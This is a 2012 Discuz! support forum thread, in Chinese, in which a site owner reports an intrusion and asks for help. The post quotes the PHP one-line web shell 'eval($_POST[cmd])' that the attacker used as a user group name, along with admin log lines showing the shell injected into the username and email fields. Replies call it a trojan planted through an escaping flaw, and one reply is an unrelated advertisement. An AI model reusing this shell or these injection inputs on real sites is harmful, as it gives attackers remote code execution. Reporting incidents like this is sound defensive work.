设为首页收藏本站
切换到宽版

Discuz!官方免费开源建站系统

 找回密码
 立即注册
搜索
Discuz!官方免费开源建站系统»论坛 Discuz! 交流与讨论 Discuz!-BUG与问题交流 <?php @eval($_POST[cmd])?>,注入风险,求帮助 ...
返回列表 发新帖

<?php @eval($_POST[cmd])?>,注入风险,求帮助

[复制链接]
蒋奉杉 发表于 2012-12-8 21:27:55 | 显示全部楼层 |阅读模式
新安装的,程序没几天,发现网站有一个注册用户,他直接提升自己为实习版主了,用户组中,同时也多了一个,用如下代码,做名称的组,<?php @eval($_POST[cmd])?>,同时,在服务器中,扫描,程序文件,发现,/data/log/201212_cplog.php
中,也存在,于这行代码相关的记录,
有很多,其中,部份如下:
<?PHP exit;?>        1354537724        admin        1        112.81.19.226        members        GET={operation=add; newusername=&lt;?php eval($_POST[cmd]);?&gt;; newpassword=123456; newemail=af@afd.com; newgroupid=10; }; POST={newusername=&lt;?php eval($_POST[cmd]);?&gt;; newpassword=123456; newemail=af@afd.com; newgroupid=10; };
<?PHP exit;?>        1354537751        admin        1        112.81.19.226        members        GET={operation=add; newusername=12‘&lt;?php eval($_POST[cmd]);?&gt;; newpassword=123456; newemail=af@afd.com; newgroupid=10; }; POST={newusername=12‘&lt;?php eval($_POST[cmd]);?&gt;; newpassword=123456; newemail=af@afd.com; newgroupid=10; };
<?PHP exit;?>        1354537761        admin        1        112.81.19.226        members        GET={operation=add; newusername=123; newpassword=123456; newemail=&lt;?php eval($_POST[cmd]);?&gt;; newgroupid=10; }; POST={newusername=123; newpassword=123456; newemail=&lt;?php eval($_POST[cmd]);?&gt;; newgroupid=10; };
<?PHP exit;?>        1354537771        admin        1        112.81.19.226        members        GET={operation=add; newusername=123; newpassword=123456; newemail=&lt;?php eval($_POST[cmd]);?&gt;@daf.com; newgroupid=10; }; POST={newusername=123; newpassword=123456; newemail=&lt;?php eval($_POST[cmd]);?&gt;@daf.com; newgroupid=10; };
<?PHP exit;?>        1354537780        admin        1        112.81.19.226        members        GET={operation=add; newusername=123; newpassword=123456; newemail='&lt;?php eval($_POST[cmd]);?&gt;1@daf.com; newgroupid=10; }; POST={newusername=123; newpassword=123456; newemail='&lt;?php eval($_POST[cmd]);?&gt;1@daf.com; newgroupid=10; };

求帮助!!!!!!!!

回复

使用道具 举报

1017057078 发表于 2012-12-8 22:21:02 | 显示全部楼层
果壳网DZ X2论坛模板,可升级,精gk网,低于威兔价格
qq号码:1017057078
1、模板整体构架参考果壳网,主要页面为左右结构,右侧都留有为用户diy的接口,因为discuz不同于果壳,所以我们只能做到神似果壳;

2、论坛页眉部分完全仿制果壳制作,登录后的个人信息均改为下拉菜单方式显示,力求简洁。导航菜单做了彻底改造,使下拉样式更加的紧凑与美观。论坛搜索框移至导航菜单右侧,小巧简洁。(参看效果图)

3、论坛首页做了彻底改造,增加了登录框(见截图),同时增加了部分论坛聚合信息(如:幻灯片,热门文章,社区达人等),着重改造了版块显示样式,参考了果壳,如果用户设置版块为横排,会在版块下方显示最新的2条主题。(其他参看效果图)

4、列表页做了彻底改造,论坛图标,名称,分类信息等内容移至顶部(效果如同果壳,见图),子版块,推荐信息等移至右侧栏,主题列表样式(包括图片显示模式在内)采用威兔布局模式,并做了进一步的简化。修改了分页连接样式,修改了快速发帖,将推荐表情移至快速发帖框上面;

5、帖子页做了彻底改造,参考果壳并继承了威兔模板的特质,页面,分页连接,快速发帖,推送,楼主相关信息等都做了优化改造;(参看效果图)
回复

使用道具 举报

pbdq 发表于 2012-12-9 11:09:18 | 显示全部楼层
这个是别人放木马。
回复

使用道具 举报

mark35 发表于 2012-12-9 17:36:01 | 显示全部楼层
被人利用转义漏洞注入攻击
回复

使用道具 举报

m.king 发表于 2012-12-10 11:43:53 | 显示全部楼层
问题已经收到,我们会看看是否是逻辑代码的问题。
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

手机版|小黑屋|Discuz! 官方站 ( 皖ICP备16010102号 )star

GMT+8, 2025-9-1 07:52 , Processed in 0.122226 second(s), 15 queries , Gzip On.

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表